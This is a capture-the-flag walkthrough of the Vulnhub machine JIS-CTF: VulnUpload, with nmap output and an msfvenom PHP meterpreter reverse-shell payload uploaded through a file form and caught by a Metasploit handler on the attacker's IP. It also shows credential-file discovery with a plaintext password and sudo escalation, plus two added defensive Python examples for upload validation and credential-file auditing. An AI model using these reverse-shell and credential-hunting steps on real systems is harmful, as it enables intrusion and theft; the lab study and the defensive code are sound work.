Vulnhub JIS-CTF: VulnUpload Writeup

This is a walkthrough of the Vulnhub machine ‘JIS-CTF: VulnUpload’, released on Feb 8, 2018, by Mohammad Khreesha. I imported the virtual machine into VirtualBox in Bridged mode. The machine has five flags waiting to be captured en route to “r00t” access.

Attacker IP: 192.168.1.108
Server IP: 192.168.1.106

Using Nmap to enumerate open ports and the services running on them:

root@kali:~# nmap -sC -sV 192.168.1.106
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-12 00:26 IST
Nmap scan report for kioptrix3.com (192.168.1.106)
Host is up (0.00021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| / /backup /admin /admin_area /r00t /uploads 
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:68:18:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds

Browsing http://192.168.1.106 shows the Sign-Up/Login form that Nmap's http-title check already reported.

Checking the robots.txt file at http://192.168.1.106/robots.txt, which lists the same eight disallowed paths Nmap found:

root@kali:~# curl http://192.168.1.106/robots.txt
User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag

Browsing http://192.168.1.106/flag/ gives the first flag.

Browsing http://192.168.1.106/admin_area gives the second flag along with a set of login credentials.

Logging in with those credentials at http://192.168.1.106/ gives access to a file upload form.

The file upload functionality is exploited to get a reverse shell: a PHP file containing a meterpreter payload is generated with msfvenom and uploaded through the form.

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=1337 -f raw > shelled.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes

Also, setting up a handler in Metasploit to catch the reverse connection on port 1337:

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.108
LHOST => 192.168.1.108
msf exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.1.108:1337 

Uploading the created shelled.php and then browsing http://192.168.1.106/uploaded_files/shelled.php executes it server-side and gives a reverse meterpreter connection.
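The root cause here is that the application stores whatever is uploaded under the document root with its client-supplied name, so a .php file becomes executable the moment it is requested. The following is an added example of the validation an upload handler should perform; it is my own code, not the writeup's and not the JIS-CTF application's. The uploads path, the image-only allowlist and the function names are assumptions for the demonstration; only the /uploaded_files directory name comes from the writeup.

```python
"""Hardened upload validation: the checks that would have rejected shelled.php.

Added example, not part of the original writeup or of the JIS-CTF application.
The policy (images only, random server-chosen names, storage outside the
document root) and every function name below are assumptions for illustration.
"""
import os
import secrets
from typing import Optional, Tuple

# Allowlist of extensions the application genuinely needs, each mapped to the
# magic bytes a file with that extension must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Extensions a web server may hand to an interpreter; never store these under
# the document root regardless of what the client claims.
SERVER_SIDE = {"php", "phtml", "php3", "php4", "php5", "phar", "cgi", "pl", "py", "sh"}


def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason).

    Every dot-separated extension is checked, not just the last one, so both
    'shell.php.png' and 'shell.png.php' are rejected; the file content must
    then match the magic bytes of the single remaining extension.
    """
    base = os.path.basename(filename)  # drop any path components the client sent
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:  # 'noext' and '.htaccess' both fail here
        return False, "no extension"
    exts = parts[1:]
    if any(e in SERVER_SIDE for e in exts):
        return False, "server-side script extension"
    if len(exts) != 1:
        return False, "multiple extensions"
    ext = exts[0]
    if ext not in ALLOWED_TYPES:
        return False, f"extension '{ext}' not allowed"
    if not content.startswith(ALLOWED_TYPES[ext]):
        return False, "content does not match extension"
    # A valid image header with PHP appended is still dangerous if any
    # misconfiguration ever routes it to the interpreter, so refuse it too.
    if b"<?php" in content or b"<?=" in content:
        return False, "embedded PHP tag"
    return True, "ok"


def storage_name(ext: str) -> str:
    """Random server-chosen name: the client never controls the stored path."""
    return f"{secrets.token_hex(16)}.{ext}"


def handle_upload(filename: str, content: bytes,
                  upload_dir: str = "/var/www/uploads_outside_docroot") -> Tuple[Optional[str], str]:
    """Validate and return (stored_path, reason); stored_path is None on rejection.
    upload_dir is an assumed location outside the web root (constructed value)."""
    ok, reason = validate_upload(filename, content)
    if not ok:
        return None, reason
    ext = os.path.basename(filename).rsplit(".", 1)[1].lower()
    return os.path.join(upload_dir, storage_name(ext)), reason


if __name__ == "__main__":
    # Constructed sample inputs: the writeup's payload name and a benign PNG.
    for name, data in [("shelled.php", b"<?php /* payload */ ?>"),
                       ("shell.php.png", b"\x89PNG\r\n\x1a\n"),
                       ("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)]:
        print(name, handle_upload(name, data))
```

Storing accepted files outside the document root and serving them through a handler that sets Content-Disposition and a fixed Content-Type is what makes the random name sufficient; the allowlist alone is not enough if the directory is still executable by the web server.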

On to the third flag:

$ pwd    
/var/www/html/uploaded_files
$ cd ..
$ ls      
admin_area
assets
check_login.php
css
flag
flag.txt
hint.txt
index.php
js
login.php
logout.php
robots.txt
uploaded_files
$ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}

As the hint suggests finding user technawi's credentials, I enumerated the files owned by that user (note that I filtered out the permission-denied and no-such-file warnings):

$ find / -user technawi -type f 2>&1 | grep -v "Permission" | grep -v "No such"
/etc/mysql/conf.d/credentials.txt
/var/www/html/flag.txt
/home/technawi/.bash_history
/home/technawi/.sudo_as_admin_successful
/home/technawi/.profile
/home/technawi/.bashrc
/home/technawi/.bash_logout
$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor
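The writeup's `find -user technawi` is the attacker's view of this weakness: a credentials file under /etc/mysql/conf.d/ readable by the web server account. The following is an added example of the defender's equivalent, a small audit that walks a directory tree and reports files that are world-readable and contain credential-looking keys. It is my own code, not the writeup's; the sample tree it builds is constructed to mirror the path and the `username :` / `password :` layout shown above, and the pattern list, the scoring rule and all function names are assumptions.

```python
"""Audit for world-readable files that appear to hold credentials.

Added example, not part of the original writeup. The /etc/mysql/conf.d/
credentials.txt path and the 'username :' / 'password :' layout come from the
writeup; the sample tree below is constructed for the demonstration and the
heuristics are assumptions.
"""
import os
import re
import stat
import tempfile
from typing import List

# Lines that start with a credential-style key followed by ':' or '='.
CREDENTIAL_PATTERNS = [
    re.compile(r"^\s*(username|user|login)\s*[:=]", re.I),
    re.compile(r"^\s*(password|passwd|pass|secret|api[_-]?key)\s*[:=]", re.I),
]


def is_world_readable(path: str) -> bool:
    """True when the 'other' read bit is set, regardless of who runs the audit."""
    return bool(os.stat(path).st_mode & stat.S_IROTH)


def looks_like_credentials(path: str, max_bytes: int = 64 * 1024) -> bool:
    """Scan the first max_bytes of a file for credential-style key lines."""
    try:
        with open(path, "rb") as fh:
            text = fh.read(max_bytes).decode("utf-8", errors="replace")
    except OSError:
        return False
    return any(p.search(line) for line in text.splitlines() for p in CREDENTIAL_PATTERNS)


def find_exposed_credentials(root: str) -> List[str]:
    """Return sorted paths under root that are both world-readable and
    credential-looking. Symlinks are skipped so the walk stays inside root."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            if is_world_readable(path) and looks_like_credentials(path):
                findings.append(path)
    return sorted(findings)


def build_sample_tree() -> str:
    """Constructed sample: an etc/mysql/conf.d with one exposed credentials
    file (mode 0644, as on the target), one properly protected one (0600) and
    one harmless config. Passwords are placeholders, not the target's."""
    root = tempfile.mkdtemp(prefix="credaudit_")
    confd = os.path.join(root, "etc", "mysql", "conf.d")
    os.makedirs(confd)
    samples = {
        "credentials.txt": ("username : technawi\npassword : <placeholder>\n", 0o644),
        "private.cnf": ("password = <placeholder>\n", 0o600),
        "mysqld.cnf": ("[mysqld]\nbind-address = 127.0.0.1\n", 0o644),
    }
    for name, (body, mode) in samples.items():
        path = os.path.join(confd, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for hit in find_exposed_credentials(sample_root):
        print("world-readable credential file:", hit)
```

Run it against /etc (or the whole filesystem) as an unprivileged user and each hit is a file that any local account, including the web server's, can read; the fix on this machine would have been `chmod 600` on credentials.txt, or better, not keeping the MySQL password in a text file under /etc at all.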

Using the obtained credentials, log in over SSH to get a shell as technawi, then elevate to root through that user's sudo access.
The fifth flag is in the folder /var/www/html.
